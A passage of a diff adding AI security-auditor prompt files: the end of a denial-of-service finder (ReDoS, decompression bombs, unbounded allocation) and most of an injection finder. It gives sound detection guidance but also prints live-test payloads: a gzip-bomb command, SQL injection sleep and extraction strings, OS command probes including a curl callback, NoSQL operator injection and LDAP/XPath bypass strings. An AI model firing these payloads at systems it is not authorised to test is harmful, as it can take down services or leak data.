+  `RequestBodyLimitLayer` / `Content-Length` check; `flate2::GzDecoder` /
+  `zip`/`tar` extract without limiting bytes; `vec![0u8; n]` /
+  `Vec::with_capacity(n)` / `String::repeat` from input; `serde_json` deep
+  nesting (mitigated by recursion limit — verify version).
+
+## 3. Detection heuristics
+
+**Taint SOURCES** (untrusted, and crucially their *size/count/value magnitude*):
+HTTP query/body/path/header/cookie values and their **length**; `Content-Length`,
+`Content-Encoding`, `Range`, `Accept` headers; multipart file contents, sizes,
+counts, and filenames; uploaded archive entry metadata (declared uncompressed
+size, entry count, nesting); JSON/XML/YAML/GraphQL documents and their **depth**;
+message-queue/webhook payloads; any numeric param later used as a count, size,
+loop bound, dimension, or iteration cost; **DB rows originally user-set** then
+fed into an expensive op (stored/second-order amplification).
+
+**Taint SINKS** (the cost-amplifying op): the calls in §2 where attacker control
+of input *length, depth, count, ratio, or a numeric magnitude* directly sets the
+work performed — regex match over an attacker string with a super-linear pattern;
+allocation/loop/recursion whose extent is input-derived; decompression whose
+output size or entry count is attacker-set; full-body read with no cap.
+
+Vulnerable patterns to confirm:
+
+- **ReDoS — catastrophic backtracking.** A backtracking-engine regex (PCRE,
+  Oniguruma/Ruby, Java `java.util.regex`, JS, Python `re`, .NET, `fancy-regex`)
+  applied to an attacker-controlled, length-unbounded subject, where the pattern
+  has **nested/overlapping quantifiers** that create exponential or polynomial
+  paths: `(a+)+`, `(a*)*`, `(a|a)*`, `(.*)*`, `(\w+\s?)*`, `(\d+)+$`, alternations
+  that overlap (`(foo|fo)+`), or a quantified group followed by a hard-to-satisfy
+  anchor/char so the engine retries every split (`^(\w+)+@`, `^(.+)+#$`). The
+  classic tell is a quantifier applied to a sub-expression that itself can match
+  the same input multiple ways, then a failing tail forcing backtracking. Confirm
+  the engine actually backtracks (see §4 for the linear-engine carve-out) and the
+  subject is attacker-controlled and not length-capped before the match.
+- **Unbounded allocation from input.** `Array.new(n)` / `make([]byte, n)` /
+  `Buffer.alloc(n)` / `vec![0; n]` / `"x" * n` / `str_repeat($s,$n)` where `n`
+  comes from input with no upper bound — one request allocates GBs.
+- **Unbounded / input-bounded loop or recursion.** `n.times`, `for i in
+  range(n)`, `while` keyed off input, recursive descent over attacker-nested
+  data (deep JSON/XML/YAML) hitting stack/CPU limits; pagination `limit` with no
+  ceiling pulling the whole table.
+- **Decompression bomb.** Decompressing attacker data without bounding the
+  *output* — a ~1 MB gzip → ~1 GB; `extractall()`/`extractTo()`/`io.Copy` from an
+  archive trusting the entry's declared size; nested archives; high-ratio
+  streams. The tell: decompress/extract with no `LimitReader`/max-output check
+  and no per-entry/total-size/entry-count cap.
+- **XML/markup expansion.** DTD entity expansion (billion laughs), YAML
+  anchors/aliases, GraphQL query depth/alias amplification, template loops driven
+  by input count.
+- **Missing limit on an expensive op.** Crypto cost (KDF rounds/key size),
+  image dimensions/pixel count, per-item process/thread/FD spawning, external
+  fan-out — all with the magnitude attacker-set and no cap.
+- **Full-body read before validation.** Server buffers the entire request body
+  (`ReadAll`/`body.read`/`get_data()`) before — or without — a size limit, so a
+  large body OOMs or pins memory regardless of later checks.
+
+Amplification matters: prefer findings where ONE small request causes large work
+(super-linear regex, decompression ratio, depth recursion) or where a trivially
+repeatable request has no per-client cap; a strictly linear cost that merely
+scales with body size already capped by a body limit is weaker.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these is present AND effective on the path:
+
+- **Linear-time regex engine.** Go `regexp` and Rust `regex` use RE2/automata —
+  **no catastrophic backtracking by construction**; a "scary" pattern there is
+  NOT ReDoS (unless `fancy-regex`/cgo PCRE is used — check the import). Likewise
+  .NET with `RegexOptions.NonBacktracking` or a `MatchTimeout` set, or any engine
+  where the match runs under an enforced timeout (`Regexp.timeout=` in Ruby 3.2+,
+  JS with a timeout wrapper, Java pattern run under a watchdog). A timeout that
+  actually bounds the match is a mitigation.
+- **Pattern is not super-linear, or subject is bounded.** A pattern with no
+  nested/overlapping quantifiers (linear) is fine even on a backtracking engine.
+  And even a bad pattern is not exploitable if the subject is **hard-length-capped
+  before the match** to a small constant (e.g. validated `length <= 64`, a route
+  segment, an enum) — the worst case is then trivially small. Verify the cap is
+  enforced *before* the regex runs.
+- **Effective size limit on the path.** A body/upload limit applied before the
+  expensive parse/alloc — `http.MaxBytesReader`, `express.json({limit})`,
+  `client_max_body_size`, `MultipartConfig.maxRequestSize`,
+  `DATA_UPLOAD_MAX_MEMORY_SIZE`, `RequestBodyLimitLayer`, Rack
+  `Rack::Utils.multipart_part_limit` / a body-limit middleware — that caps input
+  small enough that the downstream op cost is bounded. The limit must precede or
+  stream-bound the op (a check *after* a full `ReadAll` does not save memory).
+- **Bounded / validated magnitude.** The numeric driver (`n`, `limit`, `depth`,
+  `count`) is clamped to a sane max (`min(n, MAX)`, validated range, enum,
+  `LIMIT` capped server-side, pagination max enforced) before driving the loop/
+  alloc — exploitation closed.
+- **Bounded decompression.** Output is limited — `io.LimitReader`/`LimitedReader`
+  around the decompressor, a max-output byte counter that aborts, per-entry and
+  total-size and entry-count caps, ratio checks, or the library enforces them
+  (e.g. a configured max-inflate). Trusting only the archive's *declared* size is
+  NOT a mitigation (attacker sets it).
+- **Disabled XML expansion.** External entities/DTD turned off
+  (`FEATURE_SECURE_PROCESSING`, `disallow-doctype-decl`, `resolve_entities:
+  false`, `defusedxml`, `XXE`-safe parser config), YAML `safe_load`, JSON/serde
+  parser with an enforced recursion/depth limit, GraphQL depth/cost-limit
+  plugin in the schema — expansion bounded.
+- **Streaming with backpressure + bound.** The op streams in fixed chunks AND
+  enforces a total-bytes ceiling (not just "it streams"); pure streaming without
+  a cap still lets unbounded total work through — not a mitigation by itself.
+- **Per-request cost is constant / trivially small.** The input only selects
+  among a fixed small set, the loop bound is a constant, or the allocation is
+  capped by the type/protocol — no attacker-scalable cost.
+- **Authz / rate-limit / cost ceiling that bounds the abuse** (per-route rate
+  limit, quota, WAF body cap, gateway timeout that kills the request) may *lower*
+  severity but is NOT a parser-level fix; a CPU-pinning ReDoS within a single
+  request still wedges a worker before any rate limit triggers — note it, keep
+  the finding, adjust severity.
+
+If a guard exists but is bypassable — a length cap applied to the wrong field or
+after the regex, a body limit on JSON but not on the gzip/multipart path, a depth
+limit that misses alias expansion, a max checked against the *declared* not
+*actual* decompressed size, `min(n, MAX)` where MAX is itself huge — it is NOT a
+mitigation; flag it and name the bypass in `sanitizers_checked`.
+
+## 5. Severity guidance
+
+- **Critical** — unauthenticated, reachable, high-amplification: a single small
+  request pins a CPU core indefinitely (exponential ReDoS), OOMs the process
+  (unbounded alloc / decompression bomb), or exhausts disk/FDs, taking down a
+  shared worker/instance with no per-request bound — full availability loss for
+  all users from one cheap request.
+- **High** — authenticated or realistically-conditioned, still high impact:
+  polynomial ReDoS or unbounded alloc reachable behind a login, decompression
+  bomb on an authenticated upload, depth/recursion crash; or unauth but requiring
+  a handful of concurrent requests to saturate (no per-client cap). Degrades or
+  downs the service under attainable load.
+- **Medium** — constrained amplification or partial mitigation: cost scales but
+  only linearly with a body that has a generous-but-finite cap; ReDoS on a field
+  with a loose length cap that still allows seconds-not-minutes of CPU; an
+  unbounded loop bounded indirectly (downstream timeout); single-tenant/local
+  impact only.
+- **Low/Info** — theoretical cost growth with a small effective ceiling, a bad
+  regex on a provably short subject, or a missing limit defended by an effective
+  upstream gateway/WAF cap — usually downgrade or drop per §4.
+
+Note effective per-request work and whether one request or many are needed in
+`rationale`; a single-request worker-wedge is worse than a flood-only DoS.
+
+## 6. Emit findings as
+
+One JSON object per distinct root cause (dedup call sites; list extras in
+`rationale`). Fields:
+
+```json
+{
+  "id": "dos-redos-001",
+  "title": "Catastrophic-backtracking ReDoS in unauth email validator on request body",
+  "vuln_class": "dos-redos",
+  "owasp": "A06:2025",
+  "cwe": "CWE-1333",
+  "asvs": "V2",
+  "severity": "critical",
+  "status": "likely",
+  "confidence": "high",
+  "file": "src/validators/email.ts",
+  "line": 12,
+  "end_line": 14,
+  "code_excerpt": "const EMAIL = /^([a-zA-Z0-9_\\.\\-]+)+@([a-zA-Z0-9_\\.\\-]+)+\\.([a-zA-Z]{2,})$/;\nexport const valid = (s: string) => EMAIL.test(s);",
+  "source": "req.body.email — POST /signup (no auth); body length not capped before validation (express.json() has no limit option set)",
+  "sink": "EMAIL.test(s) — V8 RegExp (backtracking engine) over attacker-controlled, length-unbounded subject; nested quantifiers ([...]+)+ create exponential backtracking",
+  "data_flow": "req.body.email -> valid(s) -> EMAIL.test(s); no length check between source and sink; express.json() default has no `limit`, so subject is unbounded; engine is V8 (backtracking), not RE2",
+  "sanitizers_checked": "no length cap on email before match; express.json() called without {limit}; no regex timeout (Node has none by default); pattern IS super-linear (overlapping ([a-zA-Z0-9_.-]+)+ groups + failing '@'/tail forces exponential retries); not Go/Rust linear engine",
+  "rationale": "Reachable from the unauth signup route. A subject like 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!' (30+ 'a' then a non-matching char) forces the two nested + groups to try every partition, pinning the event loop for seconds→minutes on one request, blocking the single-threaded Node worker for ALL clients. Same pattern reused at validators/username.ts:8.",
+  "exploit_sketch": "POST /signup {\"email\":\"<40 'a's>!\"} — each request blocks the event loop ~exponentially in the prefix length; a few requests wedge the whole instance.",
+  "dynamic_poc_plan": "Send the signup request with email = 'a'*N + '!' for N=20,25,30; measure response latency. Latency roughly doubling per +1 in N (sub-second -> many seconds) confirms exponential backtracking; concurrently a benign request to any route also hangs, proving event-loop starvation.",
+  "proposed_fix": "Bound attacker-controlled work in the email-validation path so a single request can't blow up CPU: move to a linear-time matching approach and/or cap subject length before matching, and enforce a request-body limit. Exact engine/pattern/limits and the username-validator follow-up are left to the implementing engineer."
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, and `sanitizers_checked` must be
+concrete and true. `data_flow` traces source→sink and states the amplification
+mechanism — *why* the cost is super-linear/unbounded (nested-quantifier
+backtracking, input-set allocation size, decompression ratio, recursion depth) —
+and names any guard encountered and why it fails. `sanitizers_checked` is the FP
+guard made explicit: name the regex engine (backtracking vs RE2/linear), confirm
+the subject is unbounded (no length cap before match) or the magnitude
+unclamped, and list each §4 control as absent or, if present, name the exact
+bypass. A finding without an untrusted source reaching a genuinely cost-blowing
+sink — or one on a linear engine, or with an effective pre-op limit — is not a
+finding. Pick `cwe`: 1333 ReDoS, 770 alloc-without-limit (incl. decompression/
+body), 834 excessive iteration/recursion, 400 generic uncontrolled consumption.
+Use `status:"likely"` for a proven static trace, `"confirmed"` only after dynamic
+repro, `"triage"` if reachability/subject-boundedness is uncertain.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove the running service does *attacker-scalable* work — measure cost
+versus a control and show it blows up. Pick the method matching the sink:
+
+1. **ReDoS — latency-scaling oracle.** Against the live endpoint, send the
+   malicious subject at increasing sizes `N` (e.g. `'a'*N` + a tail char that
+   fails the pattern). **Observed proof** = response latency grows
+   super-linearly in `N` (exponential: ~doubles per +1; polynomial: ~N^2) — a
+   benign equal-length subject returns fast, the crafted one takes seconds→
+   minutes. For single-threaded runtimes (Node, Ruby/MRI worker, Python
+   sync worker), also fire one malicious request and concurrently a trivial
+   request to any route: the trivial one hanging proves worker/event-loop
+   starvation (whole-instance DoS, not just the one request).
+2. **Unbounded allocation / loop — memory or time oracle.** Send the request
+   with a large `n`/`count`/`depth` (e.g. `?limit=100000000`, deeply nested
+   JSON). **Observed proof** = process RSS spikes toward the limit / OOM-kill,
+   or the request hangs/times out while a control with small `n` returns
+   instantly; for recursion, a deep-nesting payload triggers a stack overflow /
+   500. Watch container memory or the process to confirm allocation tracks `n`.
+3. **Decompression bomb — output-size oracle.** Upload (or send as
+   `Content-Encoding: gzip`) a small high-ratio payload — e.g. a ~1 MB gzip that
+   inflates to ~1 GB, or a nested zip. **Observed proof** = the server's memory/
+   disk balloons far beyond the request size, or it OOMs/times out, while the
+   on-wire payload is tiny — proving output is not bounded. (Generate a bomb:
+   `dd if=/dev/zero bs=1M count=1024 | gzip > bomb.gz`, or a 42.zip-style nested
+   archive.)
+4. **XML/markup expansion — amplification oracle.** Post a billion-laughs DTD,
+   a YAML alias bomb, or a deeply nested / heavily aliased GraphQL query.
+   **Observed proof** = CPU/memory spike and a hang/OOM disproportionate to the
+   tiny request, while a flat equivalent returns instantly.
+
+Establish a baseline (control request, normal latency/RSS) first, then the
+attack, and report the delta — the *ratio* of cost to input size is the proof.
+When a partial guard exists, run the bypass: subject length just over the cap,
+the un-limited content path (gzip vs JSON), magnitude just under a too-high MAX,
+nesting/alias depth past a missing limit. Record the exact request, the
+baseline, and the observed delta in the `Repro` object (`reproduced`,
+`method:"live-exploit"`, `poc`, `observed`, `impact`); note worker-starvation
+in `notes` if a concurrent benign request also hung. If the app can't be run,
+fall back to a focused unit test that drives the sink (the regex, the
+decompressor, the loop) with the payload and asserts the blow-up
+(`method:"unit-test"`).
diff --git a/plugins/security/prompts/finders/injection.md b/plugins/security/prompts/finders/injection.md
new file mode 100644
index 0000000..abef088
--- /dev/null
+++ b/plugins/security/prompts/finders/injection.md
@@ -0,0 +1,300 @@
+<!--
+FINDER PROMPT — injection. You are a fresh-context auditor hunting ONE class:
+Injection (SQL / NoSQL / OS command / LDAP / XPath / ORM raw fragments). Read
+the target's code; emit finding objects. Signal discipline (AGENTS.md) is
+binding: only a REACHABLE untrusted-input → interpreter sink, where the input
+crosses out of the data plane into the command/query structure AND no effective
+parameterization/escaping/allowlist sits on the path, is a finding. No
+defense-in-depth musings, no dead code, no posture items.
+-->
+
+# Finder — Injection (SQL/NoSQL/OS/LDAP) (`injection`)
+
+**Class key:** `injection` · **OWASP:** A05:2025 · **CWE:** CWE-89 (SQL) /
+CWE-78 (OS) / CWE-943 (NoSQL/query-language) / CWE-90 (LDAP) / CWE-74 (generic) ·
+**ASVS:** V1/V2
+
+## 1. Objective
+
+Find places where untrusted input is concatenated/interpolated into a string
+that an interpreter parses as **structure** — a SQL/NoSQL query, an OS shell
+command, an LDAP/XPath filter — instead of being passed as an inert bound
+parameter. The bug is the attacker escaping the data plane into the command
+plane; the fix is almost always parameterization or a structural builder.
+
+## 2. Where to look
+
+Entry points where a request value reaches a query/command builder or
+interpreter:
+
+- **Data-access layers:** repositories, DAOs, `*_repository`, `models/`,
+  `db/`, query objects, "search"/"filter"/"report" endpoints that build WHERE
+  clauses, `ORDER BY`/`LIMIT`/column names from params (these can't be bound —
+  high-risk), admin SQL/console features, CSV/report exporters, GraphQL
+  resolvers translating filters to SQL, dynamic `IN (...)` list builders.
+- **OS command surfaces:** image/video/PDF processing (ffmpeg, imagemagick,
+  ghostscript, libreoffice), archive/zip handling, git/scm wrappers, DNS/whois/
+  ping/traceroute "network tools", backup/restore, shell-out to CLI utilities,
+  templating that pipes to a renderer, `Makefile`/script runners, cron/job
+  payloads that exec.
+- **NoSQL surfaces:** Mongo/Mongoose/Couch/DynamoDB/Elasticsearch query
+  builders that accept request JSON directly as the filter object, `$where`/
+  JS-eval queries, Redis `EVAL`, aggregation pipelines built from input.
+- **Directory / XML surfaces:** LDAP auth & user-search (bind/search filters),
+  SAML/SCIM lookups, XPath over XML configs/SOAP, `XPathExpression` built from
+  input.
+- **ORM escape hatches:** raw-SQL methods, `.where("...#{x}...")` string forms,
+  `find_by_sql`, `Sequel.lit`, `db.Raw`, `queryRaw`, `entityManager
+  .createQuery` with string concat, Hibernate HQL concat, `.extra()`/`.raw()`.
+
+Route/handler param signals to grep: `q`, `query`, `search`, `filter`, `sort`,
+`order`, `order_by`, `column`, `field`, `table`, `name`, `id`, `email`, `host`,
+`cmd`, `file`, `path`, `format`, `dn`, `uid`, `username` — anywhere these land
+in a string later handed to a DB driver, a shell, or an LDAP/XPath API.
+
+Per-language SINK signals:
+
+- **Crystal:** `db.query("...#{x}...")`, `db.exec`, `db.scalar` with
+  interpolation (the `?`/`$1` arg form is safe); `Process.run(cmd, shell: true)`,
+  `` `#{x}` `` backticks, `system`.
+- **Ruby:** `ActiveRecord` `where("name = '#{x}'")`, `find_by_sql("..#{x}")`,
+  `exec_query`, `connection.execute`, `order(params[:sort])`,
+  `Sequel.lit`/`db["..#{x}"]`; `` `#{x}` ``, `system("..#{x}")`,
+  `%x{#{x}}`, `Open3.capture2("sh","-c", "..#{x}")`, `Kernel.exec`;
+  Mongo `collection.find(params)`; `Net::LDAP::Filter.construct("..#{x}")`.
+- **Node/TS:** `db.query("SELECT ... " + x)`, template-literal SQL
+  `` db.query(`... ${x}`) `` (pg/mysql2), Sequelize ``sequelize.query(`..${x}`)``
+  / `literal()`, Knex ``.whereRaw(`..${x}`)``, Prisma `$queryRawUnsafe(x)` /
+  `$executeRawUnsafe`, TypeORM `createQueryBuilder().where("x = " + v)`;
+  ``child_process.exec(`..${x}`)``, `execSync`, `spawn(cmd, {shell:true})`;
+  Mongo `Model.find(req.query)` / `$where: req.body.js`; `ldapjs` search filter
+  built by concat.
+- **Python:** `cursor.execute("... %s" % x)` / `.execute(f"...{x}")` /
+  `"..."+x` (the `(sql, params)` 2-arg form is the safe one), SQLAlchemy
+  `text("..."+x)` / `.from_statement`, Django `.raw("..%s"%x)` / `.extra()` /
+  `RawSQL`; `os.system`, `subprocess.run(cmd, shell=True)`,
+  `subprocess.Popen(..., shell=True)`, `os.popen`, `commands.getoutput`;
+  `pymongo` `coll.find(request.json)` / `$where`; `ldap3` filter concat,
+  `lxml`/`etree` `xpath("..."+x)`.
+- **Go:** `db.Query(fmt.Sprintf("...%s", x))` / `db.Exec("..."+x)` (the
+  `(query, args...)` placeholder form is safe), `gorm` `.Raw(...+x)` /
+  `.Where("col = "+x)`, `sqlx` `.Queryx` with concat; `exec.Command("sh","-c",
+  "..."+x)`, `exec.Command("bash","-lc", x)`; Mongo `bson.M` built from request
+  with operator-bearing keys.
+- **PHP:** `mysqli_query($c, "...$x")`, `$pdo->query("...".$x)` (vs prepared
+  `$pdo->prepare(...).execute([...])`), `$wpdb->query("...$x")` (vs
+  `$wpdb->prepare`), Laravel `DB::raw`/`whereRaw("..$x")` /
+  `DB::select("..$x")`; `exec`, `shell_exec`, `system`, `passthru`, `popen`,
+  `` `$x` ``, `proc_open`; `ldap_search($c, $base, "(uid=$x)")`.
+- **Java:** `Statement.executeQuery("..."+x)` / `createStatement().execute`
+  (vs `PreparedStatement` `?`), `jdbcTemplate.queryForObject("..."+x)`,
+  Hibernate `createQuery("from U where name='"+x+"'")` / `createNativeQuery`;
+  `Runtime.getRuntime().exec(...+x)`, `ProcessBuilder("sh","-c", x)`;
+  `ctx.search(base, "(uid="+x+")", ...)` (JNDI/LDAP),
+  `xpath.compile("//user[@id='"+x+"']")`.
+- **Rust:** `sqlx::query(&format!("...{}", x))` (vs `sqlx::query!`/`.bind`),
+  `diesel::sql_query(format!(..))`, `rusqlite` `conn.execute(&format!(..))`
+  (vs params), `tokio_postgres` format-string query;
+  `Command::new("sh").arg("-c").arg(x)`, `std::process::Command` with a
+  shell wrapper.
+
+## 3. Detection heuristics
+
+**Taint SOURCES** (untrusted): HTTP query/body/path/header/cookie values, JSON
+fields, multipart fields & filenames, GraphQL args, message-queue/webhook
+payloads, file contents being parsed, **and DB rows that were originally
+user-set** (second-order/stored injection — value written safely, later
+concatenated into a new query). For NoSQL specifically, an entire request object
+(`req.query`, `request.json`) passed as a filter is itself a source because its
+*keys* may be operators (`$gt`, `$ne`, `$where`, `$regex`).
+
+**Taint SINKS** (dangerous op): the language-specific calls in §2 where the
+tainted value is placed in the **structural** part of the string/object —
+i.e. concatenated/interpolated/format-substituted into SQL/HQL/command/filter
+text, OR supplied as a NoSQL filter whose operator keys are attacker-controlled,
+OR used as a SQL identifier (table/column/`ORDER BY`/direction) that cannot be
+bound.
+
+Vulnerable patterns to confirm:
+
+- **String-built SQL:** any concatenation/interpolation/`Sprintf`/`%`/f-string/
+  template-literal producing query text from a source. The tell is that the
+  driver's placeholder API (`?`, `$1`, `:name`, `%s`+params tuple) is *not* used
+  for that value.
+- **Identifier injection (un-bindable):** `ORDER BY #{params[:sort]}`,
+  `SELECT #{col}`, dynamic table name. Placeholders bind *values*, never
+  identifiers — so this needs an allowlist, and concat here is exploitable even
+  when value params elsewhere are bound. Common false-safe assumption.
+- **OS command via shell:** input reaching a sink that spawns through a shell
+  (`shell:true`, `sh -c`, backticks, `os.system`, `exec(string)` where the
+  string is parsed by `/bin/sh`). Metacharacters `` ; | & $() `cmd` > < `` break out.
+  Even argv-style is unsafe if the binary itself splits/globs the arg or the
+  arg starts with `-` (argument injection, e.g. `--upload-file`, `-o`).
+- **NoSQL operator injection:** `Model.find(req.query)` where a client sends
+  `{"password":{"$ne":null}}` or `username[$regex]=^admin`; `$where`/`$function`
+  with a string from input (server-side JS eval); Mongo aggregation `$expr`
+  built from input.
+- **LDAP filter injection:** `(&(uid=#{user})(...))` with `user="*)(uid=*"` →
+  auth bypass / filter rewrite; DN built by concat enabling base/scope change.
+- **XPath injection:** `//user[name/text()='`+x+`']` with `x="' or '1'='1"`.
+- **ORM raw fragments:** the `*Unsafe`/`raw`/`lit`/`sql_query`/`whereRaw`/`.extra`
+  family fed a concatenated string. The safe sibling (`query!`, `$queryRaw`
+  tagged template, parameterized `whereRaw('?', [x])`) usually exists right
+  beside it — confirm which one is used.
+- **Second-order:** value stored via a parameterized write, then read back and
+  concatenated into a later query/command. Trace the read site, not just writes.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these is present AND effective on the path:
+
+- **Parameterized / prepared query:** the value rides in the driver's bind slot,
+  not the SQL text — `?`/`$1`/`:name` with a separate args array/tuple, JDBC
+  `PreparedStatement.setX`, `cursor.execute(sql, params)` 2-arg form, pg/mysql2
+  `query(text, values)`, Prisma `` $queryRaw`...${x}` `` *tagged template*
+  (auto-parameterized — distinct from `$queryRawUnsafe`), sqlx `query!`/`.bind`,
+  Go `db.Query(q, args...)`, Sequel/AR placeholder hashes & array conditions
+  (`where("a = ?", x)`, `where(name: x)`). This is the gold standard — if the
+  tainted value is bound, it is NOT a finding regardless of surrounding concat.
+- **ORM builder with structured args:** `where(hash)`, query-builder methods
+  passing values as params, ActiveRecord/Sequel/Ecto/Django ORM expressions that
+  emit binds. Only the *raw* escape hatches are suspect.
+- **Argv exec without a shell:** `subprocess.run([bin, arg], shell=False)`,
+  `execFile`/`spawn(bin, [args])` with `shell:false`/default, Go
+  `exec.Command(bin, arg1, arg2)` (no `sh -c`), Ruby `system(bin, arg1)` array
+  form, `ProcessBuilder` with separate args — metacharacters are inert. (Still
+  flag if argument injection applies: arg is attacker-controlled, begins with
+  `-`, and the program treats leading-dash args as options.)
+- **Identifier allowlist:** dynamic table/column/`ORDER BY`/direction mapped
+  through a fixed whitelist or enum (`{"name"=>"name","date"=>"created_at"}`,
+  `sort in ALLOWED`), so the raw string never reaches the query — safe.
+- **NoSQL with typed/cast input:** input coerced to a scalar (`String(x)`,
+  schema-validated to a primitive, Mongoose `runValidators` + strict schema, or
+  explicit `{$eq: x}`) before use, or query keys are server-defined constants
+  and only values come from input — operator injection closed. `sanitize`/
+  `mongo-sanitize`/`express-mongo-sanitize` stripping `$`/`.` keys counts if
+  applied on the path.
+- **LDAP/XPath escaping:** values passed through a real escaper —
+  `Net::LDAP::Filter.escape`, `ldap3`/`ldapjs` filter *builders* (not concat),
+  Java `Filter`/`encodeForLDAP` (ESAPI), XPath variable binding
+  (`XPathVariableResolver`/`setVariable`) instead of string concat — safe.
+- **Value provably not attacker-influenced:** a hardcoded constant, an
+  operator/config-set value, an internal enum, or a numeric value already
+  cast/validated to an integer (`Integer(x)` that raises, `parseInt` + range
+  check, typed route param `:id(\\d+)`) such that no SQL metacharacter survives.
+  A cast to int that *silently* coerces or a regex that still allows quotes is
+  NOT a mitigation.
+- **DB-side allowlist / least-priv that nullifies impact** is NOT a parser-level
+  fix — do not credit it as a sanitizer; at most it lowers severity. Note it,
+  but the injection is still a finding.
+
+If a guard exists but is bypassable (escaping the wrong context, a denylist of
+metacharacters rather than parameterization, `replace("'","''")` that misses
+backslash/`--`/Unicode, casting that silently truncates, mongo-sanitize applied
+to the wrong object), it is NOT a mitigation — flag it and name the bypass in
+`sanitizers_checked`.
+
+## 5. Severity guidance
+
+- **Critical** — unauthenticated, reachable injection into a primary datastore
+  with high impact: full SQL/NoSQL query control (data exfil/auth bypass/write),
+  OS command execution (RCE), `$where`/`EVAL` server-side code exec, or LDAP
+  bind-filter injection yielding auth bypass. Attacker controls query/command
+  structure with no effective sanitizer.
+- **High** — authenticated or realistically-conditioned injection with
+  significant impact: read/modify other tenants' data, blind boolean/time-based
+  SQLi, identifier/`ORDER BY` injection that still leaks data via error/timing,
+  OS command behind an authn wall, second-order injection with broad reach.
+- **Medium** — constrained injection: limited to a small surface (single column,
+  numeric-ish field with partial filtering), blind with a weak oracle, or a
+  partial mitigation that narrows but doesn't close exploitation; LDAP/XPath
+  injection with limited disclosure.
+- **Low/Info** — injection into a non-security-relevant local interpreter with
+  no cross-trust impact, or a theoretical concat where the value is effectively
+  constrained to a safe charset — usually downgrade or drop per §4.
+
+Second-order/stored injection keeps the severity of its eventual sink; note the
+persistence and the write→read path in `rationale`.
+
+## 6. Emit findings as
+
+One JSON object per distinct root cause (dedup call sites; list extras in
+`rationale`). Fields:
+
+```json
+{
+  "id": "injection-001",
+  "title": "Unauthenticated SQLi via sort param interpolated into ORDER BY",
+  "vuln_class": "injection",
+  "owasp": "A05:2025",
+  "cwe": "CWE-89",
+  "asvs": "V1",
+  "severity": "high",
+  "status": "likely",
+  "confidence": "high",
+  "file": "app/repositories/user_repository.rb",
+  "line": 33,
+  "end_line": 35,
+  "code_excerpt": "User.order(\"#{params[:sort]} #{params[:dir]}\").limit(50)",
+  "source": "params[:sort], params[:dir] — GET /users query string, route has no auth filter",
+  "sink": "ActiveRecord .order(\"...\") — raw string spliced into the SQL ORDER BY clause (identifiers cannot be bound)",
+  "data_flow": "params[:sort]/params[:dir] -> string interpolation -> .order(raw) -> generated SQL; values reach the query structure, not a bind slot; no allowlist between source and sink",
+  "sanitizers_checked": "no identifier allowlist/enum mapping for sort or dir; not parameterized (ORDER BY identifiers are not bindable so binds wouldn't help); no cast; AR does not escape .order() string args",
+  "rationale": "Reachable from unauth route; sort=\"(CASE WHEN (SELECT ...) THEN name ELSE id END)\" enables boolean/time-based blind extraction of arbitrary columns. Same pattern at report_repository.rb:71 (group_by).",
+  "exploit_sketch": "GET /users?sort=(SELECT CASE WHEN (SUBSTR(password,1,1)='a') THEN name ELSE id END)&dir=asc -> row ordering changes oracle-style, leaking the hash char by char.",
+  "dynamic_poc_plan": "Send a sort payload with a SLEEP/pg_sleep CASE subquery; observe response-time delta vs a benign sort to confirm the subquery executes inside the live DB query.",
+  "proposed_fix": "Identifiers can't be bound, so the sort/dir inputs must be constrained to a known-good set of columns and directions rather than reaching the SQL structure as raw strings; this closes the data-plane escape while leaving the exact mechanism to the implementer."
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, and `sanitizers_checked` must be
+concrete and true. `data_flow` traces variables source→sink and states why the
+value lands in the command plane (concat/interpolation/identifier) rather than a
+bind slot, naming any guard encountered and why it fails. `sanitizers_checked`
+is the FP guard made explicit — list each §4 control and state it is absent or,
+if present, name the exact bypass (e.g. "quote-doubling only, backslash escapes
+the closing quote"). A finding without an untrusted source reaching a real
+interpreter sink in the structural position is not a finding. Pick `cwe` by
+interpreter: 89 SQL, 78 OS, 943 NoSQL/query, 90 LDAP, 74 generic/other. Use
+`status:"likely"` for a proven static trace, `"confirmed"` only after dynamic
+repro, `"triage"` if reachability/source is uncertain.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove the running interpreter parses attacker input as structure, not
+data. Pick the oracle matching the sink:
+
+1. **SQL — error/boolean/time oracle.** Against the live endpoint, send a
+   payload that changes the *query's truth or shape*:
+   - **Error:** inject an unbalanced quote (`'`) or type-clash; **observed proof**
+     = a DB syntax error surfaced/logged (500 with SQL fragment, driver error)
+     that a bound parameter could never produce.
+   - **Boolean:** compare `?id=1 AND 1=1` vs `?id=1 AND 1=2` — **observed proof**
+     = the two requests return different result sets (one row vs none).
+   - **Time-blind:** inject `;SELECT pg_sleep(5)`/`SLEEP(5)`/`WAITFOR DELAY`;
+     **observed proof** = response latency tracks the requested delay (5s vs
+     control), proving the injected SQL ran in the DB.
+2. **OS command — out-of-band or marker.** Inject a benign side-effect:
+   `; sleep 5`, `$(sleep 5)`, `| id`, or `; curl http://<listener>/<nonce>`.
+   **Observed proof** = the listener records the nonce hit from the server host,
+   OR the response/timing reflects the injected command (latency delta, `id`/
+   `uname` output echoed). Prefer the OOB callback for blind cases.
+3. **NoSQL — operator oracle.** Send `username[$ne]=x` / JSON
+   `{"$gt":""}` / `{"$where":"sleep(5000)||true"}`; **observed proof** = an
+   auth/login that should fail now succeeds (returns a session/record), or the
+   `$where` sleep induces a measurable delay — both impossible if the value were
+   treated as a scalar.
+4. **LDAP / XPath — filter-rewrite oracle.** Send `*)(uid=*` (LDAP) or
+   `' or '1'='1` (XPath); **observed proof** = a lookup that should match one or
+   zero entries now returns all/expanded results, or a login succeeds without
+   valid credentials.
+
+Run the relevant bypass checks when a partial guard exists: quote-escaping
+evasion (backslash, double-encoding, Unicode quote), comment terminators
+(`--`, `#`, `/* */`), stacked queries if the driver allows, argv argument
+injection (leading `-`/`--option`), and mongo-sanitize bypass (nested/`.`-keyed
+operators). Record the exact request and observed evidence in the `Repro`
+object (`reproduced`, `method:"live-exploit"`, `poc`, `observed`, `impact`).
+A time/OOB confirmation alone proves injection — set `method:"live-exploit"`
+and note blindness in `notes`. If the app can't be run, fall back to a focused
